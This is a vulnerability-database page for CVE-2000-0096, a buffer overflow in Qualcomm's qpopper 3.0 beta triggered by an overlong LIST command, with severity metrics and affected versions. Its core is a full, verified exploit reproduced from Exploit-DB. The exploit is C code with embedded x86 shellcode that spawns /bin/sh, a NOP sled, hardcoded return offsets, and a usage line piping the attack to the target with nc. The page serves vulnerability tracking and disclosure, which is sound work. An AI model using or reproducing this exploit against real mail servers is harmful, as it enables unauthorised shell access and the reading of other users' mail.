CVE-2000-0096 : Detail

CVE-2000-0096

0.13%V4
Local
2000-02-08
04h00 +00:00
2004-04-20
07h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in qpopper 3.0 beta versions allows local users to gain privileges via a long LIST command.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19729

Publication date : 2000-01-09 23h00 +00:00
Author : Zhodiac
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/948/info A remotely exploitable buffer-overflow vulnerability affects Qualcomm's 'qpopper' daemon. This issue allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon. The problem lies in the code that handles the 'LIST' command available to logged-in users. By providing an overly long argument, an attacker may cause a buffer to overflow. As a result, the attacker can gain access with the user ID (UID) of the user whose account is being used for the attack and with the group ID (GID) mail. This will allow remote attackers to access the server itself and possibly (depending on how the computer is configured) to read other users' mail via the GID mail. /* * !Hispahack Research Team * http://hispahack.ccc.de * * By Zhodiac <zhodiac@softhome.net> * * Linux (x86) Qpopper xploit 3.0beta29 or lower (not 2.53) * Overflow at pop_list()->pop_msg() * * Tested: 3.0beta28 offset=0 * 3.0beta26 offset=0 * 3.0beta25 offset=0 * * #include <standar/disclaimer.h> * * This code is dedicated to my love [CrAsH]] and to all the people who * were raided in Spain in the last few days. * * Madrid 10/1/2000 * */ #include <stdio.h> #define BUFFERSIZE 1004 #define NOP 0x90 #define OFFSET 0xbfffd9c4 char shellcode[]= "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89" "\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04\x03\xcd\x80\x31\xdb\x89" "\xd8\x40\xcd\x80\xe8\xd9\xff\xff\xff/bin/sh"; void usage(char *progname) { fprintf(stderr,"Usage: (%s <login> <password> [<offset>]; cat) | nc <target> 110",progname); exit(1); } int main(int argc, char **argv) { char *ptr,buffer[BUFFERSIZE]; unsigned long *long_ptr,offset=OFFSET; int aux; fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.de)\n"); fprintf(stderr,"Qpopper xploit by Zhodiac <zhodiac@softhome.net>\n\n"); if (argc<3) usage(argv[0]); if (argc==4) offset+=atol(argv[3]); ptr=buffer; memset(ptr,0,sizeof(buffer)); memset(ptr,NOP,sizeof(buffer)-strlen(shellcode)-16); ptr+=sizeof(buffer)-strlen(shellcode)-16; memcpy(ptr,shellcode,strlen(shellcode)); ptr+=strlen(shellcode); long_ptr=(unsigned long*)ptr; for(aux=0;aux<4;aux++) *(long_ptr++)=offset; ptr=(char *)long_ptr; *ptr='\0'; fprintf(stderr,"Buffer size: %d\n",strlen(buffer)); fprintf(stderr,"Offset: 0x%lx\n\n",offset); printf("USER %s\n",argv[1]); sleep(1); printf("PASS %s\n",argv[2]); sleep(1); printf("LIST 1 %s\n",buffer); sleep(1); printf("uname -a; id\n"); return(0); }

Products Mentioned

Configuraton 0

Qualcomm>>Qpopper >> Version 3.0

Qualcomm>>Qpopper >> Version 3.0beta1

    Qualcomm>>Qpopper >> Version 3.0beta2

      Qualcomm>>Qpopper >> Version 3.0beta3

        Qualcomm>>Qpopper >> Version 3.0beta4

          Qualcomm>>Qpopper >> Version 3.0beta5

            Qualcomm>>Qpopper >> Version 3.0beta6

              Qualcomm>>Qpopper >> Version 3.0beta7

                Qualcomm>>Qpopper >> Version 3.0beta8

                  Qualcomm>>Qpopper >> Version 3.0beta9

                    Qualcomm>>Qpopper >> Version 3.0beta10

                      Qualcomm>>Qpopper >> Version 3.0beta11

                        Qualcomm>>Qpopper >> Version 3.0beta12

                          Qualcomm>>Qpopper >> Version 3.0beta13

                            Qualcomm>>Qpopper >> Version 3.0beta14

                              Qualcomm>>Qpopper >> Version 3.0beta15

                                Qualcomm>>Qpopper >> Version 3.0beta16

                                  Qualcomm>>Qpopper >> Version 3.0beta17

                                    Qualcomm>>Qpopper >> Version 3.0beta18

                                      Qualcomm>>Qpopper >> Version 3.0beta19

                                        Qualcomm>>Qpopper >> Version 3.0beta20

                                          Qualcomm>>Qpopper >> Version 3.0beta21

                                            Qualcomm>>Qpopper >> Version 3.0beta22

                                              Qualcomm>>Qpopper >> Version 3.0beta23

                                                Qualcomm>>Qpopper >> Version 3.0beta24

                                                  Qualcomm>>Qpopper >> Version 3.0beta25

                                                    Qualcomm>>Qpopper >> Version 3.0beta26

                                                      Qualcomm>>Qpopper >> Version 3.0beta27

                                                        Qualcomm>>Qpopper >> Version 3.0beta28

                                                          Qualcomm>>Qpopper >> Version 3.0beta29

                                                            References

                                                            http://www.securityfocus.com/bid/948
                                                            Tags : vdb-entry, x_refsource_BID